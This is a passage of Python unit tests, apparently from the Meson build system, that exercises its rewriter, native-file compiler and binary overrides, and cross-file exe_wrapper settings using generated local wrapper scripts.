'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, } } self.assertDictEqual(out, expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, expected) def test_target_add_sources_abs(self): self.prime('1 basic') abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']] add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}]) inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}]) self.rewrite(self.builddir, add) out = self.rewrite(self.builddir, inf) expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}} self.assertDictEqual(out, expected) def test_target_remove_sources(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']}, } } self.assertDictEqual(out, expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, expected) def test_target_subdir(self): self.prime('2 subdirs') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']} self.assertDictEqual(list(out['target'].values())[0], expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(list(out['target'].values())[0], expected) def test_target_remove(self): self.prime('1 basic') self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, } } self.assertDictEqual(out, expected) def test_tatrget_add(self): self.prime('1 basic') self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']}, } } self.assertDictEqual(out, expected) def test_target_remove_subdir(self): self.prime('2 subdirs') self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, {}) def test_target_add_subdir(self): self.prime('2 subdirs') self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = {'name': 'something', 'sources': ['first.c', 'second.c']} self.assertDictEqual(out['target']['94b671c@@something@exe'], expected) def test_target_source_sorting(self): self.prime('5 sorting') add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}]) inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}]) out = self.rewrite(self.builddir, add_json) out = self.rewrite(self.builddir, inf_json) expected = { 'target': { 'exe1@exe': { 'name': 'exe1', 'sources': [ 'aaa/a/a1.c', 'aaa/b/b1.c', 'aaa/b/b2.c', 'aaa/f1.c', 'aaa/f2.c', 'aaa/f3.c', 'bbb/a/b1.c', 'bbb/b/b2.c', 'bbb/c1/b5.c', 'bbb/c2/b7.c', 'bbb/c10/b6.c', 'bbb/a4.c', 'bbb/b3.c', 'bbb/b4.c', 'bbb/b5.c', 'a1.c', 'a2.c', 'a3.c', 'a10.c', 'a20.c', 'a30.c', 'a100.c', 'a101.c', 'a110.c', 'a210.c', 'a666.c', 'b1.c', 'c2.c' ] } } } self.assertDictEqual(out, expected) def test_target_same_name_skip(self): self.prime('4 same name targets') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = {'name': 'myExe', 'sources': ['main.cpp']} self.assertEqual(len(out['target']), 2) for val in out['target'].values(): self.assertDictEqual(expected, val) def test_kwargs_info(self): self.prime('3 kwargs') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_set(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']}, 'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'}, 'dependency#dep1': {'required': True, 'method': 'cmake'} } } self.assertDictEqual(out, expected) def test_kwargs_add(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_remove(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'license': 'GPL'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_remove_regex(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_delete(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {}, 'target#tgt1': {}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_default_options_set(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_default_options_delete(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) class NativeFileTests(BasePlatformTests): def setUp(self): super().setUp() self.testcase = os.path.join(self.unit_test_dir, '47 native file binary') self.current_config = 0 self.current_wrapper = 0 def helper_create_native_file(self, values): """Create a config file as a temporary file. values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): if isinstance(v, (bool, int, float)): f.write("{}={}\n".format(k, v)) elif isinstance(v, list): f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v]))) else: f.write("{}='{}'\n".format(k, v)) return filename def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs): """Creates a wrapper around a binary that overrides specific values.""" filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper)) extra_args = extra_args or {} self.current_wrapper += 1 if is_haiku(): chbang = '#!/bin/env python3' else: chbang = '#!/usr/bin/env python3' with open(filename, 'wt') as f: f.write(textwrap.dedent('''\ {} import argparse import subprocess import sys def main(): parser = argparse.ArgumentParser() '''.format(chbang))) for name in chain(extra_args, kwargs): f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name)) f.write(' args, extra_args = parser.parse_known_args()\n') for name, value in chain(extra_args.items(), kwargs.items()): f.write(' if args.{}:\n'.format(name)) f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout'))) f.write(' sys.exit(0)\n') f.write(textwrap.dedent(''' ret = subprocess.run( ["{}"] + extra_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(ret.stdout.decode('utf-8')) print(ret.stderr.decode('utf-8'), file=sys.stderr) sys.exit(ret.returncode) if __name__ == '__main__': main() '''.format(binary))) if not is_windows(): os.chmod(filename, 0o755) return filename # On windows we need yet another level of indirection, as cmd cannot # invoke python files itself, so instead we generate a .bat file, which # invokes our python wrapper batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper)) with open(batfile, 'wt') as f: f.write(r'@{} {} %*'.format(sys.executable, filename)) return batfile def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST): """Helper for generating tests for overriding compilers for langaugages with more than one implementation, such as C, C++, ObjC, ObjC++, and D. """ env = get_fake_env() getter = getattr(env, 'detect_{}_compiler'.format(lang)) getter = functools.partial(getter, for_machine) cc = getter() binary, newid = cb(cc) env.binaries[for_machine].binaries[lang] = binary compiler = getter() self.assertEqual(compiler.id, newid) def test_multiple_native_files_override(self): wrapper = self.helper_create_binary_wrapper('bash', version='foo') config = self.helper_create_native_file({'binaries': {'bash': wrapper}}) wrapper = self.helper_create_binary_wrapper('bash', version='12345') config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}}) self.init(self.testcase, extra_args=[ '--native-file', config, '--native-file', config2, '-Dcase=find_program']) # This test hangs on cygwin. @unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.') def test_native_file_is_pipe(self): fifo = os.path.join(self.builddir, 'native.file') os.mkfifo(fifo) with tempfile.TemporaryDirectory() as d: wrapper = self.helper_create_binary_wrapper('bash', d, version='12345') def filler(): with open(fifo, 'w') as f: f.write('[binaries]\n') f.write("bash = '{}'\n".format(wrapper)) thread = threading.Thread(target=filler) thread.start() self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program']) thread.join() os.unlink(fifo) self.init(self.testcase, extra_args=['--wipe']) def test_multiple_native_files(self): wrapper = self.helper_create_binary_wrapper('bash', version='12345') config = self.helper_create_native_file({'binaries': {'bash': wrapper}}) wrapper = self.helper_create_binary_wrapper('python') config2 = self.helper_create_native_file({'binaries': {'python': wrapper}}) self.init(self.testcase, extra_args=[ '--native-file', config, '--native-file', config2, '-Dcase=find_program']) def _simple_test(self, case, binary, entry=None): wrapper = self.helper_create_binary_wrapper(binary, version='12345') config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}}) self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)]) def test_find_program(self): self._simple_test('find_program', 'bash') def test_config_tool_dep(self): # Do the skip at this level to avoid screwing up the cache if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2') if not shutil.which('llvm-config'): raise unittest.SkipTest('No llvm-installed, cannot test') self._simple_test('config_dep', 'llvm-config') def test_python3_module(self): self._simple_test('python3', 'python3') def test_python_module(self): if is_windows(): # Bat adds extra crap to stdout, so the version check logic in the # python module breaks. This is fine on other OSes because they # don't need the extra indirection. raise unittest.SkipTest('bat indirection breaks internal sanity checks.') elif is_osx(): binary = 'python' else: binary = 'python2' # We not have python2, check for it for v in ['2', '2.7', '-2.7']: rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if rc == 0: break else: raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.') self._simple_test('python', binary, entry='python') @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard') @skip_if_env_set('CC') def test_c_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang', 'clang' if not is_real_gnu_compiler(shutil.which('gcc')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'gcc', 'gcc' self.helper_for_compiler('c', cb) @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard') @skip_if_env_set('CXX') def test_cpp_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang++'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang++', 'clang' if not is_real_gnu_compiler(shutil.which('g++')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'g++', 'gcc' self.helper_for_compiler('cpp', cb) @skip_if_not_language('objc') @skip_if_env_set('OBJC') def test_objc_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang', 'clang' if not is_real_gnu_compiler(shutil.which('gcc')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'gcc', 'gcc' self.helper_for_compiler('objc', cb) @skip_if_not_language('objcpp') @skip_if_env_set('OBJCXX') def test_objcpp_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang++'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang++', 'clang' if not is_real_gnu_compiler(shutil.which('g++')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'g++', 'gcc' self.helper_for_compiler('objcpp', cb) @skip_if_not_language('d') @skip_if_env_set('DC') def test_d_compiler(self): def cb(comp): if comp.id == 'dmd': if shutil.which('ldc'): return 'ldc', 'ldc' elif shutil.which('gdc'): return 'gdc', 'gdc' else: raise unittest.SkipTest('No alternative dlang compiler found.') if shutil.which('dmd'): return 'dmd', 'dmd' raise unittest.SkipTest('No alternative dlang compiler found.') self.helper_for_compiler('d', cb) @skip_if_not_language('cs') @skip_if_env_set('CSC') def test_cs_compiler(self): def cb(comp): if comp.id == 'csc': if not shutil.which('mcs'): raise unittest.SkipTest('No alternate C# implementation.') return 'mcs', 'mcs' if not shutil.which('csc'): raise unittest.SkipTest('No alternate C# implementation.') return 'csc', 'csc' self.helper_for_compiler('cs', cb) @skip_if_not_language('fortran') @skip_if_env_set('FC') def test_fortran_compiler(self): def cb(comp): if comp.id == 'lcc': if shutil.which('lfortran'): return 'lfortran', 'lcc' raise unittest.SkipTest('No alternate Fortran implementation.') elif comp.id == 'gcc': if shutil.which('ifort'): # There is an ICC for windows (windows build, linux host), # but we don't support that ATM so lets not worry about it. if is_windows(): return 'ifort', 'intel-cl' return 'ifort', 'intel' elif shutil.which('flang'): return 'flang', 'flang' elif shutil.which('pgfortran'): return 'pgfortran', 'pgi' # XXX: there are several other fortran compilers meson # supports, but I don't have any of them to test with raise unittest.SkipTest('No alternate Fortran implementation.') if not shutil.which('gfortran'): raise unittest.SkipTest('No alternate Fortran implementation.') return 'gfortran', 'gcc' self.helper_for_compiler('fortran', cb) def _single_implementation_compiler(self, lang, binary, version_str, version): """Helper for languages with a single (supported) implementation. Builds a wrapper around the compiler to override the version. """ wrapper = self.helper_create_binary_wrapper(binary, version=version_str) env = get_fake_env() getter = getattr(env, 'detect_{}_compiler'.format(lang)) getter = functools.partial(getter, MachineChoice.HOST) env.binaries.host.binaries[lang] = wrapper compiler = getter() self.assertEqual(compiler.version, version) @skip_if_not_language('vala') @skip_if_env_set('VALAC') def test_vala_compiler(self): self._single_implementation_compiler( 'vala', 'valac', 'Vala 1.2345', '1.2345') @skip_if_not_language('rust') @skip_if_env_set('RUSTC') def test_rust_compiler(self): self._single_implementation_compiler( 'rust', 'rustc', 'rustc 1.2345', '1.2345') @skip_if_not_language('java') def test_java_compiler(self): self._single_implementation_compiler( 'java', 'javac', 'javac 9.99.77', '9.99.77') @skip_if_not_language('swift') def test_swift_compiler(self): wrapper = self.helper_create_binary_wrapper( 'swiftc', version='Swift 1.2345', outfile='stderr', extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'}) env = get_fake_env() env.binaries.host.binaries['swift'] = wrapper compiler = env.detect_swift_compiler(MachineChoice.HOST) self.assertEqual(compiler.version, '1.2345') def test_native_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile')]) def test_native_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib']) def test_compile_sys_path(self): """Compiling with a native file stored in a system path works. There was a bug which caused the paths to be stored incorrectly and would result in ninja invoking meson in an infinite loop. This tests for that by actually invoking ninja. """ testcase = os.path.join(self.common_test_dir, '1 trivial') # It really doesn't matter what's in the native file, just that it exists config = self.helper_create_native_file({'binaries': {'bash': 'false'}}) self.init(testcase, extra_args=['--native-file', config]) self.build() def test_user_options(self): testcase = os.path.join(self.common_test_dir, '41 options') for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0), ('CaseSenSiTivE', 'SOME other Value'), ('CASESENSITIVE', 'some other Value')]: config = self.helper_create_native_file({'project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_user_options_command_line_overrides(self): testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_native_file({'project options': {'other_one': True}}) self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false']) def test_user_options_subproject(self): testcase = os.path.join(self.unit_test_dir, '80 user options for subproject') s = os.path.join(testcase, 'subprojects') if not os.path.exists(s): os.mkdir(s) s = os.path.join(s, 'sub') if not os.path.exists(s): sub = os.path.join(self.common_test_dir, '41 options') shutil.copytree(sub, s) for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0)]: config = self.helper_create_native_file({'sub:project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_option_bool(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'werror': True}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'werror' in each['name']: self.assertEqual(each['value'], True) break else: self.fail('Did not find werror in build options?') def test_option_integer(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'unity_size': 100}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'unity_size' in each['name']: self.assertEqual(each['value'], 100) break else: self.fail('Did not find unity_size in build options?') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('Did not find werror in build options?') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}}) self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'}) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/foo']) break else: self.fail('Did not find pkg_config_path in build options?') def test_builtin_options_subprojects(self): testcase = os.path.join(self.common_test_dir, '99 subproject subdir') config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: # Test that no-per subproject options are inherited from the parent if 'c_args' in each['name']: # This path will be hit twice, once for build and once for host, self.assertEqual(each['value'], ['-Dfoo']) found += 1 elif each['name'] == 'default_library': self.assertEqual(each['value'], 'both') found += 1 elif each['name'] == 'sub:default_library': self.assertEqual(each['value'], 'static') found += 1 self.assertEqual(found, 4, 'Did not find all three sections') def test_builtin_options_subprojects_overrides_buildfiles(self): # If the buildfile says subproject(... default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertIn(cm.exception.stdout, 'Parent should override default_library') def test_builtin_options_subprojects_dont_inherits_parent_override(self): # If the buildfile says subproject(... default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}}) self.init(testcase, extra_args=['--native-file', config]) def test_builtin_options_compiler_properties(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'c_args': ['-DFOO']}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DFOO']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_compiler_properties_legacy(self): # The legacy placement in properties is still valid if a 'built-in # options' setting is present, but doesn't have the lang_args testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DBAR']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_paths(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'bindir': 'foo'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'foo') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') class CrossFileTests(BasePlatformTests): """Tests for cross file functionality not directly related to cross compiling. This is mainly aimed to testing overrides from cross files. """ def setUp(self): super().setUp() self.current_config = 0 self.current_wrapper = 0 def _cross_file_generator(self, *, needs_exe_wrapper: bool = False, exe_wrapper: T.Optional[T.List[str]] = None) -> str: if is_windows(): raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows') return textwrap.dedent(f"""\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'} [properties] needs_exe_wrapper = {needs_exe_wrapper} [host_machine] system = 'linux' cpu_family = 'x86' cpu = 'i686' endian = 'little' """) def _stub_exe_wrapper(self) -> str: return textwrap.dedent('''\ #!/usr/bin/env python3 import subprocess import sys sys.exit(subprocess.run(sys.argv[1:]).returncode) ''') def test_needs_exe_wrapper_true(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') def test_needs_exe_wrapper_false(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=False)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertNotRegex(out, r'Skipped:\s*1\n') def test_needs_exe_wrapper_true_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: s = Path(d) / 'wrapper.py' with s.open('wt') as f: f.write(self._stub_exe_wrapper()) s.chmod(0o774) p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator( needs_exe_wrapper=True, exe_wrapper=[str(s)])) self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true']) out = self.run_target('test') self.assertRegex(out, r'Ok:\s*3\s*\n') def test_cross_exe_passed_no_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) self.build() out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') # The test uses mocking and thus requires that the current process is the # one to run the Meson steps. If we are using an external test executable # (most commonly in Debian autopkgtests) then the mocking won't work. @unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.') def test_cross_file_system_paths(self): if is_windows(): raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)') testdir = os.path.join(self.common_test_dir, '1 trivial') cross_content = self._cross_file_generator() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}): os.environ.pop('XDG_DATA_HOME', None) self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) 